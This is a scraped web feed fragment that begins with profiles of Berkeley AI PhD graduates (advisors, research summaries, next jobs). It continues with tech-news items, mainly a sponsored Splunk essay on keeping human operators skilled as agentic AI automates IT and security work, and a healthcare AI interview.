          <a href="https://kevin.black/"><img src="https://bair.berkeley.edu/static/blog/grads2026/kevin-black.jpg" alt="Kevin Black" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Kevin Black</h1><br>
              <strong>Email:</strong><a href="mailto:kvablack@berkeley.edu"> kvablack@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://kevin.black/">https://kevin.black</a><br>
              
              <strong>Advisor(s):</strong> Sergey Levine<br>
              
              <strong>Research Blurb:</strong> I work on large-scale robot learning: including imitation learning, reinforcement learning, generative modeling, real-time control, and whatever else it takes to make robots work in the real world!<br>
              
              
              <strong>What's next:</strong> Research Scientist of Physical Intelligence
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://www.kunheyang.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/kunhe-yang.jpg" alt="Kunhe Yang" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Kunhe Yang</h1><br>
              <strong>Email:</strong><a href="mailto:kunheyang@berkeley.edu"> kunheyang@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://www.kunheyang.com/">https://www.kunheyang.com/</a><br>
              
              <strong>Advisor(s):</strong> Nika Haghtalab<br>
              
              <strong>Research Blurb:</strong> My research focuses on the theoretical foundations of designing and evaluating AI algorithms in environments shaped by human incentives and AI agency. My work spans human-centric policy learning, incentive-aware evaluation, and multi-agent collaboration and information transmission, drawing on tools from machine learning theory and computational economics.<br>
              
              
              <strong>What's next:</strong> Postdoc Research at Stanford
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://lisabdunlap.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/lisa-dunlap.jpg" alt="Lisa Dunlap" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Lisa Dunlap</h1><br>
              <strong>Email:</strong><a href="mailto:lisabdunlap@berkeley.edu"> lisabdunlap@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://lisabdunlap.com/">https://lisabdunlap.com</a><br>
              
              <strong>Advisor(s):</strong> Joseph Gonzalez, Trevor Darrell<br>
              
              <strong>Research Blurb:</strong> Auditing generative models.<br>
              
              
              <strong>What's next:</strong> Research Engineer at Anthropic
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://tonylian.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/long-tony-lian.jpg" alt="Long (Tony) Lian" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Long (Tony) Lian</h1><br>
              <strong>Email:</strong><a href="mailto:longlian@berkeley.edu"> longlian@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://tonylian.com/">https://tonylian.com/</a><br>
              
              <strong>Advisor(s):</strong> Trevor Darrell, Adam Yala<br>
              
              <strong>Research Blurb:</strong> My research primarily focuses on developing real-time multi-modal multi-agent systems and parallel reasoning systems through end-to-end RL.<br>
              
              
              <strong>What's next:</strong> Member of Technical Staff at Thinking Machines Lab
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://maulikb.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/maulik-bhatt.jpg" alt="Maulik Bhatt" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Maulik Bhatt</h1><br>
              <strong>Email:</strong><a href="mailto:maulikbhatt@berkeley.edu"> maulikbhatt@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://maulikb.com/">https://maulikb.com</a><br>
              
              <strong>Advisor(s):</strong> Negar Mehr<br>
              
              <strong>Research Blurb:</strong> My research develops autonomous robots that can safely coordinate with humans and other robots in shared environments. I build scalable algorithms grounded in game theory and diffusion models that let agents reason about the intent and behavior of others around them. My work spans real-time multi-agent trajectory planning and imitation learning in the presence of multi-modality. I've validated these methods on hardware platforms ranging from quadrotors to manipulators, with the goal of making multi-agent coordination robust, interpretable, and deployable in the real world.<br>
              
              
              <strong>What's next:</strong> Joining Toyota Woven's end-to-end autonomous driving team.
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://www.michaelpsenka.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/michael-psenka.jpg" alt="Michael Psenka" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Michael Psenka</h1><br>
              <strong>Email:</strong><a href="mailto:psenka@berkeley.edu"> psenka@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://www.michaelpsenka.io/">https://www.michaelpsenka.io/</a><br>
              
              <strong>Advisor(s):</strong> Aditi Krishnapriyan<br>
              
              <strong>Research Blurb:</strong> Work in various domains (reinforcement learning, world models, AI+bio/chem), generally working on longer-horizon and out-of-distribution problems in planning and interpolation (e.g. robot manipulation from start state to goal, molecular dynamics of proteins between ground states). My thesis took a variational approach (think calculus of variations) directly from deep generative models of the environment, framing path-finding as minimizing a functional induced by the learned model itself (its score, its critic, or its dynamics). Through my research I've gained insight on how to properly handle dynamics in deep learning systems, and I plan to continue developing systems that are dynamic and adaptive.<br>
              
              
              <strong>What's next:</strong> Lead Research Scientist at Baseten
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://nathanlichtle.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/nathan-lichtle.jpg" alt="Nathan Lichtlé" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Nathan Lichtlé</h1><br>
              <strong>Email:</strong><a href="mailto:nathan.lichtle@gmail.com"> nathan.lichtle@gmail.com</a><br>
              <strong>Website:</strong> <a href="https://nathanlichtle.com/">https://nathanlichtle.com</a><br>
              
              <strong>Advisor(s):</strong> Alexandre M. Bayen<br>
              
              <strong>Research Blurb:</strong> RL for autonomous driving.<br>
              
              
              <strong>What's next:</strong> Chief Scientist &amp; Co-founder at Yumi Health
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://neerja.me/"><img src="https://bair.berkeley.edu/static/blog/grads2026/neerja-thakkar.jpg" alt="Neerja Thakkar" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Neerja Thakkar</h1><br>
              <strong>Email:</strong><a href="mailto:nthakkar@berkeley.edu"> nthakkar@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://neerja.me/">https://neerja.me/</a><br>
              
              <strong>Advisor(s):</strong> Jitendra Malik<br>
              
              <strong>Research Blurb:</strong> My research focuses on scaling predictive world models to handle the complexity of in-the-wild motion. Using autoregressive and diffusion frameworks, I develop better representations for real-world prediction and propose methods to efficiently adapt these models to new domains.<br>
              
              
              <strong>Looking for:</strong> Research scientist
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://n-mehandru.github.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/nikita-mehandru.jpg" alt="Nikita Mehandru" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Nikita Mehandru</h1><br>
              <strong>Email:</strong><a href="mailto:nmehandru@berkeley.edu"> nmehandru@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://n-mehandru.github.io/">https://n-mehandru.github.io/</a><br>
              
              <strong>Advisor(s):</strong> Ahmed Alaa and David Bamman<br>
              
              <strong>Research Blurb:</strong> My research develops and applies machine learning methods for clinical reasoning and disease progression modeling using unstructured text and time series data from electronic health records. In collaboration with physicians at UCSF, I bridge method development and clinical validation with the intention to build reliable, interpretable AI systems in medicine.<br>
              
              
              <strong>Looking for:</strong> Research Scientist
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://niklaslauffer.github.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/niklas-lauffer.jpg" alt="Niklas Lauffer" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Niklas Lauffer</h1><br>
              <strong>Email:</strong><a href="mailto:nlauffer@berkeley.edu"> nlauffer@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://niklaslauffer.github.io/">https://niklaslauffer.github.io/</a><br>
              
              <strong>Advisor(s):</strong> Stuart Russell and Sanjit Seshia<br>
              
              <strong>Research Blurb:</strong> Niklas's research is focused on AI safety and reinforcement learning, particularly in the area of multi-agent interaction and LM agents. He's worked on enabling adversarial learning in cooperative and mixed-motive settings, solving issues of covariate shift in training LM agents on long-horizon tasks, as well as evaluating safety risks posed by LM agents in multi-agent settings.<br>
              
              
              <strong>What's next:</strong> Research Scientist at Google Deepmind
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://colinqiyangli.github.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/qiyang-li.jpg" alt="Qiyang Li" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Qiyang Li</h1><br>
              <strong>Email:</strong><a href="mailto:qcli@berkeley.edu"> qcli@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://colinqiyangli.github.io/">https://colinqiyangli.github.io/</a><br>
              
              <strong>Advisor(s):</strong> Sergey Levine<br>
              
              <strong>Research Blurb:</strong> Recent progress in robotic manipulation policy learning has been largely driven by (1) the increasing availability of large-scale prior datasets and (2) the success of action chunking, where the policy predicts a short sequence of future actions rather than a single one. However, most action chunking policies are trained via supervised imitation learning, because efficient online self-improvement with reinforcement learning (RL) remains challenging—limiting real-world applicability. My PhD research studied how we could leverage prior data to optimize action-chunking policies with RL, combining empirical results with theoretical insights.<br>
              
              
              <strong>Looking for:</strong> Post-doc/research scientist for RL in robotics and LLMs!
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://sdeglurkar.github.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/sampada-deglurkar.jpg" alt="Sampada Deglurkar" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Sampada Deglurkar</h1><br>
              <strong>Email:</strong><a href="mailto:sampada_deglurkar@berkeley.edu"> sampada_deglurkar@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://sdeglurkar.github.io/">https://sdeglurkar.github.io/</a><br>
              
              <strong>Advisor(s):</strong> Prof Claire Tomlin<br>
              
              <strong>Research Blurb:</strong> My research is in providing safety assurances for AI-enabled autonomous systems, ranging from robots to autonomous vehicles to aviation systems. For this, I have worked with uncertainty quantification for machine learning models, decision-making under uncertainty algorithms, and tools for producing probabilistic guarantees on system operation.<br>
              
              
              <strong>Looking for:</strong> Research scientist, Research engineer
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://cs.berkeley.edu/~vbenara"><img src="https://bair.berkeley.edu/static/blog/grads2026/vinamra-benara.jpg" alt="Vinamra Benara" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Vinamra Benara</h1><br>
              <strong>Email:</strong><a href="mailto:vbenara@berkeley.edu"> vbenara@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://cs.berkeley.edu/~vbenara">https://cs.berkeley.edu/~vbenara</a><br>
              
              <strong>Advisor(s):</strong> Ion Stoica<br>
              
              <strong>Research Blurb:</strong> My research focuses on LLM post-training, including data curation, RLHF, RLVR with VLMs, evaluations, reasoning, agentic workflows, and interpretability. I also have strong expertise in systems infrastructure for distributed computing.<br>
              
              
              <strong>Looking for:</strong> Research scientist / Research Engineer
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://people.eecs.berkeley.edu/~vongani_maluleke/"><img src="https://bair.berkeley.edu/static/blog/grads2026/vongani-maluleke.jpg" alt="Vongani Maluleke" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Vongani Maluleke</h1><br>
              <strong>Email:</strong><a href="mailto:vongani_maluleke@berkeley.edu"> vongani_maluleke@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://people.eecs.berkeley.edu/~vongani_maluleke/">https://people.eecs.berkeley.edu/~vongani_maluleke/</a><br>
              
              <strong>Advisor(s):</strong> Jitendra Malik and Angjoo Kanazawa<br>
              
              <strong>Research Blurb:</strong> Vongani Maluleke is a PhD candidate at UC Berkeley (BAIR, advised by Jitendra Malik and Angjoo Kanazawa), where she led the development of MAGNet, a unified multi-agent motion generation framework that supports a wide range of motion generation tasks without retraining or architectural changes, outperforming task-specialized state-of-the-art baselines. She is currently extending this work by deploying it on a Unitree G1 humanoid to make it embody social intelligence. Before her PhD, she was a Senior AI Consultant at Deloitte, awarded Exceptional Performer two consecutive years, leading AI system development across media, telecommunications, retail, and financial services.<br>
              
              
              <strong>Looking for:</strong> Research scientist
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://weijer-chang.github.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/wei-jer-chang.jpg" alt="Wei-Jer Chang" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Wei-Jer Chang</h1><br>
              <strong>Email:</strong><a href="mailto:weijer_chang@berkeley.edu"> weijer_chang@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://weijer-chang.github.io/">https://weijer-chang.github.io/</a><br>
              
              <strong>Advisor(s):</strong> Masayoshi Tomizuka<br>
              
              <strong>Research Blurb:</strong> My research focuses on developing safe and intelligent autonomous systems for complex, human-centered environments. I work at the intersection of machine learning, generative models, and reinforcement learning, with applications in autonomy. My work addresses challenges in multi-agent interaction, interactive human behavior, and long-tail safety-critical scenarios at scale.<br>
              
              
              <strong>Looking for:</strong> Research Scientist, Applied Scientist, Roboticist
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://xiuyuli.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/xiuyu-li.jpg" alt="Xiuyu Li" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Xiuyu Li</h1><br>
              <strong>Email:</strong><a href="mailto:xiuyu@berkeley.edu"> xiuyu@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://xiuyuli.com/">https://xiuyuli.com/</a><br>
              
              <strong>Advisor(s):</strong> Kurt Keutzer<br>
              
              <strong>Research Blurb:</strong> My research focuses on developing scalable and self-improving large language model agents, with emphasis on coding agents for complex, long-horizon tasks. This direction builds on my work in parallel reasoning, and on broader expertise in making generative models more efficient in training and inference across language and vision.<br>
              
              
              <strong>What's next:</strong> Member of Technical Staff at xAI
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://yichen928.github.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/yichen-xie.jpg" alt="Yichen Xie" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Yichen Xie</h1><br>
              <strong>Email:</strong><a href="mailto:yichenxie0928@gmail.com"> yichenxie0928@gmail.com</a><br>
              <strong>Website:</strong> <a href="https://yichen928.github.io/">https://yichen928.github.io/</a><br>
              
              <strong>Advisor(s):</strong> Masayoshi Tomizuka<br>
              
              <strong>Research Blurb:</strong> My research focuses on building multimodal foundation models and world models that understand and interact with complex physical environments. I aim to develop unified representations across modalities, enabling AI systems to reason over space, time, and dynamics toward general-purpose embodied intelligence.<br>
              
              
              <strong>What's next:</strong> Research Scientist at Luma AI
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://www.linkedin.com/in/erginbas/"><img src="https://bair.berkeley.edu/static/blog/grads2026/yigit-efe-erginbas.jpg" alt="Yigit Efe Erginbas" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Yigit Efe Erginbas</h1><br>
              <strong>Email:</strong><a href="mailto:erginbas@berkeley.edu"> erginbas@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://www.linkedin.com/in/erginbas/">https://www.linkedin.com/in/erginbas/</a><br>
              
              <strong>Advisor(s):</strong> Kannan Ramchandran, Thomas A. Courtade<br>
              
              <strong>Research Blurb:</strong> My PhD research spans two threads: online learning in large-scale markets, and interpretability of large machine learning models. In the first, I work on sequential decision-making with applications to recommendation, pricing, and assortment selection. My focus is on designing algorithms with provable guarantees for welfare maximization, revenue maximization, and stability. In the second, I develop scalable attribution methods that exploit the sparse, low-degree structure of real-world interactions, using tools from signal processing and information theory. More recently, I have been exploring principled ways to evaluate the faithfulness of model self-explanations.<br>
              
              
              <strong>What's next:</strong> Researcher at Hudson River Trading's AI Labs (HAIL)
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://yihengli.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/yiheng-li.jpg" alt="Yiheng Li" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Yiheng Li</h1><br>
              <strong>Email:</strong><a href="mailto:yhli@berkeley.edu"> yhli@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://yihengli.com/">https://Yihengli.com</a><br>
              
              <strong>Advisor(s):</strong> Masayoshi Tomizuka<br>
              
              <strong>Research Blurb:</strong> I am working on vision world modeling, with prior experience in diffusion model's efficiency as well as in autonomous driving.<br>
              
              
              <strong>What's next:</strong> Research Scientist at Waymo
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://fu-zhe.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/zhe-fu.jpg" alt="Zhe Fu" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Zhe Fu</h1><br>
              <strong>Email:</strong><a href="mailto:zhefu@berkeley.edu"> zhefu@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://fu-zhe.com/">https://fu-zhe.com/</a><br>
              
              <strong>Advisor(s):</strong> Alexandre Bayen<br>
              
              <strong>Research Blurb:</strong> My research focuses on physics-informed learning and control for mixed-autonomy systems, with applications in transportation. I design physics-informed neural networks to learn solutions of nonlinear partial differential equations, enabling accurate and data-efficient prediction of traffic dynamics. Building on these models, I develop both model-based and learning-based control strategies that coordinate automated vehicles to improve system-level performance. My work bridges machine learning, control, and real-world deployment, and has been validated in large-scale field experiments. More broadly, I aim to advance trustworthy, interpretable AI for decision-making in complex, real-world systems.<br>
              
              
              <strong>What's next:</strong> I will be an Energy Fellow at Stanford after graduation. Also looking for Faculty, or research scientist positions in AI, control, and autonomy.
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
  </div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Digital resilience compounds when AI and human expertise scale together]]></title>
<description><![CDATA[Presented by Splunk Agentic AI is making IT and security teams dramatically more efficient. But it’s also removing the apprenticeship that has long produced experienced operators. As organizations automate more of the work once performed by junior analysts and engineers, they’re confronting a cha...]]></description>
<link>https://tsecurity.de/de/3639544/it-nachrichten/digital-resilience-compounds-when-ai-and-human-expertise-scale-together/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639544/it-nachrichten/digital-resilience-compounds-when-ai-and-human-expertise-scale-together/</guid>
<pubDate>Wed, 01 Jul 2026 21:33:03 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><i>Presented by Splunk </i></p><hr><p>Agentic AI is making IT and security teams dramatically more efficient. But it’s also removing the apprenticeship that has long produced experienced operators. </p><p>As organizations automate more of the work once performed by junior analysts and engineers, they’re confronting a challenge that’s as much about workforce design as architecture design: how to build the next generation of experts when AI handles the work that once trained them.</p><h2>What the junior workforce has been doing</h2><p>For two decades, the path to becoming a world-class SecOps analyst, SRE, or NetOps engineer ran through repetition.</p><p>Triaging false positives. Hunting through dashboards for context. Reading logs at 2 a.m. that turned out to be benign. The industry treated this work as drudgery, and in many ways it was.</p><p>But it also served as the apprenticeship.</p><p>The thousands of hours an analyst spent staring at traffic patterns built the intuition that made them invaluable when a real attack arrived. That intuition was not taught in a single course or captured in a runbook. It was accumulated through exposure, pattern recognition, failure, and escalation. Over time, this is how people earn deep analytical experience.</p><p>However, agentic AI is now beginning to automate the very tasks that once served as the training ground for that expertise. That is not a reason to slow down. The drudgery was costly. The burnout was real. Organizations should use agents to reduce toil wherever they can.</p><p>At the same time, as we remove that apprenticeship loop, we need to provide operators something better in its place. How organizations approach this issue today will determine the winners for the future.</p><p>Organizations that approach this deliberately will produce the operators skilled to succeed in the next decade. Organizations that punt on this may find themselves with faster systems today, but with fewer people who understand them deeply enough to govern them tomorrow.</p><h2>When automation hollows out accountability</h2><p>There is also a second dimension to this conversation that gets less attention than it should.</p><p>In regulated environments, the drudgery of apprenticeship is part of the accountability layer. Frameworks from SOX to PCI DSS to HIPAA to NIS2 assume there is a chain of human judgments behind a control decision.</p><p>Auditors do not interview models. They interview people who can explain why a system did what it did, why the decision was sound, and whether the right controls were in place.</p><p>When the population of professionals who can explain that chain begins to thin, the risk may not appear immediately. The control may still pass. The workflow may still be executed. The dashboard may still look green.</p><p>But the underlying organizational memory begins to hollow out.</p><p>This is not simply a tooling problem. It is also a workforce skill and design problem. And for organizations moving quickly on agentic adoption, the risk is closer than many think.</p><h2>Building human expertise to govern AI</h2><p>When we lose part of the accountability layer to agents, humans will step into a different type of governance role. Governing an agentic system means implementing automated guardrails that adapt to non-deterministic agent behavior and ensure<s>s</s> agents behave appropriately under conditions no one fully anticipated. It means designing escalation criteria that catch the right anomalies without overwhelming humans with the wrong ones. It means implementing dynamic tools, alerts, and processes to review machine decisions to detect drift, bias, and reasoning failures that no individual case would reveal.</p><p>The ability to evaluate and respond to these exceptions requires judgment built over years of experience, learning pattern recognition that the old apprenticeship model used to produce.</p><p>That is why the workforce question and the architecture question are now the same question. If we expect humans to govern increasingly autonomous systems, we need intentional pathways that help people manage the scale and speed of AI systems while building the intuition and judgment in human operators required to do that work.</p><p>In the AI era, the most valuable platforms will not simply automate the most tasks. They will help people become more capable, more credible, and more essential as the systems around them become faster and more intelligent.</p><p>That means organizations need to invest in the full ecosystem of expertise for operators: communities that spread shared practices, certifications or other proofs that make expertise visible, and human-oriented explanations and verifications in the AI along with learning paths that build capability. Empowerment is an architecture design choice</p><p>Human empowerment is a critical part of the conversation around the practical use of AI. However, without an intentional strategy to back this up, it risks becoming the kind of phrase that means nothing because it can mean anything.</p><p>Empowerment for agentic systems cannot just be a conceptual requirement. It has to be a set of design choices baked into how systems behave. An agentic system that empowers its human operators and grows their professional skillset does four things:</p><h5>1. Exposes reasoning, with the data lineage behind it</h5><p>Every recommendation an agent makes should be traceable to the data it considered, the logic it applied, and the provenance of the inputs it used. Operators who can see reasoning develop judgment about when to trust it. Operators handed only conclusions do not.</p><h5>2. Tiers authority by confidence and impact</h5><p>Familiar, low-risk patterns can be handled autonomously. Novel situations or actions with meaningful blast radius should escalate by default. The boundary should be explicit and configurable by the teams that own the consequences.</p><h5>3. Treats disagreements as a correction signal</h5><p>When an experienced engineer overrides an agent, they are doing more than disagreeing. They are correcting the system with judgment the model did not have: a fragile dependency, a quirk in the environment, a constraint the data never saw. A system that registers the override but ignores the reasoning behind it learns nothing from the one moment a human knew better.</p><h5>4. Captures resolutions as cross-domain knowledge</h5><p>How an incident gets resolved is a lesson that rarely stays in one lane. A SecOps incident may expose an ITOps weakness. A network issue may trace back to business impact. When that connection lives only inside a closed ticket, the next team to hit it starts from zero. Resolutions should travel across domains, not die where they were filed.</p><p>These are not aspirational qualities. They are testable product capabilities. Leaders evaluating agentic systems should be able to identify where these capabilities live, what happens when they fail, and whether operator skill improves after deployment.</p><h2>The next advantage is when human and AI scale together</h2><p>For AI systems to be practical, trusted, and work at scale, the critical design point is for the AI to work deeply alongside and empower human operators. </p><p>As such, the agentic era is not a story about replacing humans. It is a story about redesigning the systems humans operate so that these operations can happen at machine speed and scale, while human expertise grows at the same time. Together, rather than at each other's expense.</p><p>That outcome is not a given. It will happen only where leaders treat operator development as a priority, not an afterthought. To achieve this, agentic systems have to be intentionally designed to expose reasoning, capture learning, and route work back to humans in ways that build skill and career rather than erode both.</p><p>The agents will keep getting smarter and faster. The ability of operators who work alongside them to learn and grow in lockstep, will determine whether the next decade of digital resilience is something organizations truly own, or something they rent from a shrinking pool of expertise. </p><p><b><i>Learn more about how </i></b><a href="https://www.splunk.com/ciscodatafabric"><b><i>Cisco Data Fabric powered by the Splunk Platform</i></b></a><b><i> is helping teams accelerate agentic operations.</i></b></p><p><i>Kamal Hathi is SVP and GM of Splunk, a Cisco Company.</i></p><hr><p><i>Sponsored articles are content produced by a company that is either paying for the post or has a business relationship with VentureBeat, and they’re always clearly marked. For more information, contact </i><a href="mailto:sales@venturebeat.com"><i><u>sales@venturebeat.com</u></i></a><i>.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic AI bedroht 234-Mrd-Dollar-SaaS-Markt - All About Security]]></title>
<description><![CDATA[Nach Brocklehursts Einschätzung eröffnet dies solchen Akteuren gleich zwei Umsatzquellen: Zum einen können sie bereits bestehende IT-Budgets für sich ...]]></description>
<link>https://tsecurity.de/de/3639258/it-security-nachrichten/agentic-ai-bedroht-234-mrd-dollar-saas-markt-all-about-security/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639258/it-security-nachrichten/agentic-ai-bedroht-234-mrd-dollar-saas-markt-all-about-security/</guid>
<pubDate>Wed, 01 Jul 2026 19:08:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Nach Brocklehursts Einschätzung eröffnet dies solchen Akteuren gleich zwei Umsatzquellen: Zum einen können sie bereits bestehende <b>IT</b>-Budgets für sich ...]]></content:encoded>
</item>
<item>
<title><![CDATA[SaaS has a big identity problem]]></title>
<description><![CDATA[With more guest access than licensed users, firms are being compromised through the trusted identities and collaboration tools they rely on every day]]></description>
<link>https://tsecurity.de/de/3638402/it-security-nachrichten/saas-has-a-big-identity-problem/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638402/it-security-nachrichten/saas-has-a-big-identity-problem/</guid>
<pubDate>Wed, 01 Jul 2026 13:50:42 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[With more guest access than licensed users, firms are being compromised through the trusted identities and collaboration tools they rely on every day]]></content:encoded>
</item>
<item>
<title><![CDATA[Using AI to reinvent care delivery at Novant Health]]></title>
<description><![CDATA[In healthcare, the pressure to improve outcomes while reducing costs has never been greater. Yet many organizations are still applying AI to existing systems rather than using it to fundamentally change them. At Novant Health, that shift is being driven in part by establishing the chief AI office...]]></description>
<link>https://tsecurity.de/de/3638074/it-security-nachrichten/using-ai-to-reinvent-care-delivery-at-novant-health/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3638074/it-security-nachrichten/using-ai-to-reinvent-care-delivery-at-novant-health/</guid>
<pubDate>Wed, 01 Jul 2026 12:08:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>In healthcare, the pressure to improve outcomes while reducing costs has never been greater. Yet many organizations are still applying AI to existing systems rather than using it to fundamentally change them. At Novant Health, that shift is being driven in part by establishing the chief AI officer role last year, which Vijay Sankararaman has held since then. He uses AI to reshape how care is accessed, delivered, and supported across the enterprise, all while being a catalyst to rethink how the organization operates end to end.</p>



<p><strong>How is AI helping Novant Health achieve its vison?</strong></p>



<p>Our cause is to provide a remarkable experience for our patients, to make it easier, more valuable, and more meaningful for them to access the healthcare we provide 24/7 across primary care, specialty, ambulatory, emergency, and pharmacy. But we live in a changing world with economic headwinds for patients and their healthcare teams, so transformation for us is about reimagining the patient experience, ease of use for clinicians, and value-add from our operations. That’s our AI lens.</p>



